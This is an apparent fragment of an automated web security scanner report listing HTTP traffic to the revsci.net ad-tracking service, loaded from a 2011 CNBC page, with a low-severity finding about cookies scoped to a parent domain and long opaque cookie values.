rtc_YxMN=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; rsiPus_L6z4="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/k0pvXbTc7xC8rSTKo6YlWoDaU7ig3joPvt9kFbYlGb0EQjzx/jklRuXQl514E3J4urcf4As6hj1VY7tYYw6Wiq1cNENFE3yHIPMbarmxNg+FfHDCN8yAI0deNs/vy72wd9LCsUoGRxJj1LZtB1EKeqCiEBk5w0c/BaHsfzh8VuaCzASbJAkIs4nlXJvVbz7E1ZM32JOQOqSxu8bEs0TGSRrkMXwSoXE8O8ONW74BuzfMuFUKzQ0iIijpyVV3KpSi+vUxpqwyFERiamjxpb3I8pcPEqEHw/Ndtb3UbanUY2yJ80VbWrezB+yGOeJC+rBM1koZLdZoiigO8ldqLf5W41S51MrxbbdGyNKaACldFZxUDPGyANwYN5ScoYWOP084V8PtwwhCbn88JcNx1A7nG4Qxj6dxpaDE5jhKkyckVuaQMH+Igry3zK6Zr7Hxjl12LOVVU4nfbCmVpPs4Qz1UxBfDhf3J2U1Of/SgIAlE5DfQPf+r8iAux1Qa7gC9TQbm78rehiD8RXf799lloGlA3AYDvxYxgEwb2Ub6LGosmsoaBMgLKoPMrePLINcmHo/L9LI9UpcU9xWxalGpoTysXYUNciXWJJrxWtdc1xC0DmDMnflG8zzmcmOTq8NlkJw66K24N6LcaZnpO2rTow+8ELhvB+Y8hQdaPJbGMNXPC7yM8hKXkZn0UuFllkUwP+2xuWOBiubrQU4B22/YjWbwvd9MaC51wuLwFVqOuzdV6G474XXDM9F3w6hy3d/VamrLSr5WHx43SnTTthn2Mi87ywTUbjeG9qMJnEF+QEzixNPC/KnHq7dLqMabv9Q73Ky8aBjzwovQbBguryhap3a9qADNLQQTJ/ziAMutRQjRiiC+AsWbYjfwpFVnF+CDORhYKFZ2H/jZeENocfH23gTT+KWoATckA8Ms2YTx4yb/3MEYb7rFRl1yUYmeyFPzx0dWl9MQIZLgQEdaD3uX6N5CUxZTl/1zyIKdArQg5sk1gNTWEoHYY8go4OttXUyGnLzpjRRL5ZbuyGwi6unPtPDBtZlHCtI8PgPnWbf+0tDV93Z6pxsjajaALbunFczjwI+xwOh/x29VmC0nSE+MuwJfX6RQ76Zg0qiEJw5tMtFTVtj4EZ3BBAaZMl9GAr5vi0llnov2DxG/mDq9wTCoHCcVAPrYyRuMzUecf+UfV7094BjzFyqh3zeAw9F7uQnnFRG8Zj6G6HK2IyUqScIFL27Yk1d88AsXtt7RiDiKeBtje/94w2388iXKSXy9iDEisTyvFf8JWuDM6/+A29ZVmjUOi7qH7/98KzLWyXQU51tY="; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgxZDz2jywJqL21DklO4Fpq7W4mts2r3+iyqdBm+PLbybIfPRXAGyAWqGaUcN76Ja1qAOTDE6FHSoqvcSTZGmsjHtyxiXTlK6880FLG12A2PlULpyvcZq9IqvpxPKk0YhA04L1Nso5MmhH0E/wCH/Y1ZbonZH/Q/zyE8fVAttnFQDh4QDENSCazWB7wm3+nPmKOwFtWi3KgcXOk7dGFHTPtbI66KrO68kGZE+JkCfFVU7Wqivfeaan8/Ww7TBQ+iOcjF+lqvdirOi3uZTKpcnbwP0nJnsijbA/cJS8z7XZpW5E27Q8oHruI+D7xiQrYDXrgYCt7vxjlWiD0C7R3piUSf/X68aLEy3FTmG/xOMAoB69ZpMVfVMOaN8xjaZmZFCuwIv05D/jAgdQfdSrSmgeY3750+E1SRiV/ZFvgLLd16SDmvClK0VlVAU/fsEzmYD7l8fVAU7jiogS+0Qv3AMbNVmxayNCHy3ChZjaNwlPaqwwx67SCivFHxB9DK/5DqEJMyqX/b4nmJd1sizBco+S9u1wADdn1mEiP0cG0kQhfa8BJQp7nfqZyWsMwhyUOXknFtAlMD+/N1Tf3YLzOyBSO4Ry4TqDG2tc4XDIDvE/0jSgLCVJl7JQFnZBdW+tTAB1MFykWYyofsoidj2JlJamhp3DY0/RBn6thG4Dp3s72ZJUYY0XOZqyQj2T8YQFLjnM1nRoUIH51pw9a+XC6/yKJernGASO36t/t5FL9IaTAyHB/Kgk2PsUHT7JHI1FJeoXMZUWQ3IJ40P2RazBsPtOJsRHYYj1EagV7aBrMgMjjVwnZNGXxRYK7al/v2h2S+Lbrvh/S7WnfwbfpPJtgUFL2sKAk2mwRO9FRTAnLRXaZeRA85QvODnBEGs2HYhYIGOvAMNdzQg7raKfVqUTcDtULMLcnwbqeiuW0ZORlzBZg2H48M4JkC0QjZIXrp3+spukhaZZMBrzGQTmupwuOe96u/7UbzQwbNRvXBF8fS41sao01s0agvokyA1BrEK7PTBT+8UI6MhreApqHuDCn0jEVj6Ms6LIixwoTRPi4BAc8lAs2xVidUGM5jGYEeAOzzbo3YZiuCU7/ENI60dmB9cLMjgnGjd6347khTu6QZseW7cYg/fDMJyZYj0u/pAEEgcp3yWa7A8NRcfokfMwE7541fbx90L5Bx/mJCRXuTukYUneKCzPxe2tFD8dvJ0WGMCjNCVOaNAim/Tvv6Lv6HHQyaGaD1KczbwIxxOndI3TaF7EVxsRbvk/i2YK9sr+WpmekirZUBhxwUEeyTk+uOjSdaMkEugc/Qyz3VLyw7iD79IvKf+x++RnA+JITe686qeKE3ArJUzbxrUQdgUT/uh+oTQ2uq6Rmnla+9xs/g2C6tyFcby4UDvkTLN65pBDusOLnVbsgcafXGhoJHbcOZvxsqGELS6OcgRnwPVWojGL1YfSYGnlciMaCkyDIf3BR61utD51N9acAOotArxOTiW3wcJZcpG/7xWb9nrTX4wPGe36O2v1jrR4iOkCPQAqcnfolq4BuwXJbwnI+RTX2vmKgE8E5NxHti4gOjrBAFT6qOF1VD+nR6ZpI0wfr4JE327YphjwER3irP5aFIf+KDcbJV0Qj82t9WibKJvYInpBRQujtD2tbgJt9Q65r1p1vTCaG/LUtomn2lPD9VBzbJeur9tdbuU1zAqZp4mJHNmHW7YrZjcaOOiO9WRPVvOZWe5+Cc+GM5Z91ku4lg="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZS68evNkl+Cfd3FJdJ6UiH0ZMmaBwmG86hGNHqCcmpBdIf5ho+uLCE6vyBtQLChUXPl+uuA8ryr9Xa8GV3rzFV2GWZA8yYqZYNSgUGOjN0rrR0E5k+41339fWkpMoWHoGz0fnygCNr+iRy+/rLmSSJ/UUg2l+U9duz9sNNQ=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPLlJc8T19VoEG91R/79+lt4fZilDrszXU7mdAMjFIkIYxMQCSNyifbqIhvmfRHQ/bfPEmoxjG9KsFrlIFpqF0DOsPBltx7T6Ls9mCUpsrdHAlqV622l96+o10Ip9jbnCOxhY2O+6BBt79v61ZquiPu+e8/TqC8ufzKjWyLX+CkGA7hBRd4KqxbK4GR3kr10P1alTxuIdxjE/vbgXj273xLQtFoAuMgvhXM+gRZosHNtdBlyI9PehcinFhTPHvJybV7PKGo2x/wdWBIATm7BeR5l66J4IED/xpidjbkw2u1kTEZnZn9WBtlgoahVnyL84qaA73tC4HvMP6AIXggyvgrmsWzt6IKQdWUHX7AMC8hesN6xhqUk6yK6Tj++FJJtKzuEVSP4KgLXeJZ+4qcJhmo3tTD2Dn1cvueINMs=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:13:18 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.151. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/352735390.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRjpph0jIkaE2ihTZ1EWU0vpLSFy6hYxRi9kT0nVw0G9iNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMn2j4dIePr7B6ylMielihtHMj4PH19L1WPbI6B5vhMs6HbnIYcPx43tgk7tyNv/CzYfV5FqstcqOop1zqPFXKfXvvmEm0NN7M6M9909gJersEqbws/ZDBnp4g3ZVklyBZNtqf05W2rfLwB6MSKTCxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8x3HAB03EhK8Q3gpuZ0FUT1jb5xgJ0/NQhFabP01; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:26:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/352735390.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_ONLV="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudNqQAMqTK+yvs0UNiAwl8R+cnLZYDAKxqQ3exUvCK92NbkCmBjUcmYgL2c8DOlwGIjCNcghgKhJjvAKjv19bXY2VOe9PIcfFRS2PTLk5K7xrV1h+U1UrXfyI+jlaTBcbDW24RCO28mf1q+Vt8LxjJin2qcD/pndsuMUOJR5owc+VUUAgi/NfIMVBerUwoCgf1qlIXxUKVVeGtIOfqO6WlprUaQsbRQOsVVI1fZLyAXN8yTLveAurwsJrpYGXbfPKfnxM1NOMBCctsCBLPP0bBK/+6xyJp17Ka/PMQ5Kd9fOSzkUndQsGV3L5DI6nQSI8k1GpBGJ40nzIKved0MNk67rdRqviQC8xXrrf5Wgqg518rncbdGwMKWA6td1Z926M73UpQ4VYOzGH2mIxyawgJ2w2Ucjxj4L8OSb9Cgcp3V8AMkbd1iMC2zAXwvkKCv2tiDNuqN8X67SY6heXabD9tUSbRO+jlgbRMPmx5Ur6WGT98QIt8DNc2/aAiAnFPftQ5irnndn8cDeLAOzc2+JfzwdjqQx8in9THyegOXGIi/OsjeCJmTOM2FavSBbjcJVTo1YtQi1m81helS60W0HVKZ1erqM1nEDjqiENDW6ufRgF8Vm7z9Ye8YIC/6tyBuJQ/QJ1AO/GQeezqjq9PfeKg+FZvwayCe7/CqIJEfqI3ESQxqh4SfBpvEpBh52NeuIFb+WDNgdBD6gH/AroxWz/J3UalFEW+DCMFEKalyy0V+i+NtOa4SQkVlqHh7JpaMss3NgVLjMnsZ2SZ3Fc2/5j0Ne7+2R6R/MhYa5KvoPGpTdfkP9zxGK6s0P6FkZjbhBdhHGlgi2EnnkSTVL60HO8aY3j2uVBJbm/X7EH/IadNxKmOqhpWfCOEbovEdpa8obAExMp5IPM5Sk0YrKuLC3mrvHuf4cNi2rT8TZbR8W3OO/SoZOgbK2/D+ItniJd6wrWFv2AFlnsySw6AztChp5i7rmA0g8m4XP0K+rkjZJ27gVULEz5XYIdzNZ340xCEYPuSlkzkTLfBUn9LlEDf4giMI8F0WnokT4rKo0jyOUZWf/tjA5I/1OjVoUCikYRYmBgNIQnHmVOEjkNDeKIGRoEowj21fB32dMe+rXMbYEJmEPltdEcuozdoT3BDArVnqP3unrQcbiuzi2lqah1rNRK+bLZPjyngxhRPsjyU+ZCw1VdWwKGt/C/DqTPKUqI6mtebE8BeG0lU7qM3mG3Ogon7HEPC0Kz8iTcLFrGzck29k6cMnKw5p09V7ErTANO4YRZLY+7D/3zyQxKuNGqYU6QQnRGa+KWvfFTd4uATj58KRH2je88adQppvfsQ=="; 